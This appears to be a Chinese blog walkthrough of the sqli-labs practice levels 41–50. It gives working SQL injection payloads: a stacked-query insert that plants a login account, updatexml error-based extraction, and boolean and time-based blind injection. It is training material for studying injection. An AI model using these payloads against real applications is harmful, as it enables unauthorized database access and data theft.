第四十一关
联合查询爆出数据库
但这关考察的时堆叠注入 ,我们给他注入一条数据
输入id=50即可查到我们注入的数据
第四十二关
看页面似曾相识,上次我们是用注册新用户然后对其他账户进行登录从而造成注入,但这次不能注册新用户了
存在堆叠注入函数,所以我们可以在密码哪里使用堆叠注入。向数据库里面插入密码账号,这样我们再来使用其进行登录就很简单了。
login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login
因为密码处有报错,所以我们使用报错注入爆出库名
login_user=1&login_password=1000'or updatexml(1,concat(1,database()),3)--+&mysubmit=Login
第四十三关
和第四十二关一样,只是闭合方式不同
login_user=1&login_password=1000')or updatexml(1,concat(1,database()),3)--+&mysubmit=Login
第四十四关
这关和四十二关一样,但是不能使用报错注入,不会显示报错信息
因为页面只有两种,我们尝试布尔盲注 ,正确页面没显示,确定数据库名为8位
用ascii码测试出库名,SCII码等于115,所以得出数据库第一位是s,继续测其它位就行
login_user=1&login_password=1000' or (ascii(substr(database() ,1,1)))=115--+&mysubmit=Login
第四十五关
和上一关一样,只是闭合方式不同,采用布尔盲注即可
第四十六关
这一关和其他关有所不同,根据页面提示我们的参数变成了sort,我们输入?sort=1,进入下图界面
输入?sort=1'会报错,就先尝试一下报错注入吧
成功爆出库名
?sort=1 and updatexml(1,concat(1,database()),3)--+
爆表名
?sort=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)--+
第四十七关
和上一关一样,只是闭合不同
?sort=1' and updatexml(1,concat(1,database()),3)--+
爆出库名
第四十八关
这关只有两个页面,所以考虑使用时间盲注
测出数据库有8位
?sort=1 and if(length(database())=8,sleep(1),1)--+
使用时间盲注语句得出数据库名第一位ascii码为115,同方法依次查出库名
?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)--+
第四十九关
和第四十八关一样,只不过是闭合不同
?sort=1' and if(length(database())=8,sleep(1),1)--+
第五十关
先加个'看看,报错了我们尝试使用报错函数
直接爆出库名
?sort=updatexml(1,concat(0x7e,database(),0x7e),1)
标签:sort,labs,database,41,60,报错,updatexml,login,concat From: https://blog.csdn.net/kknifek/article/details/141645482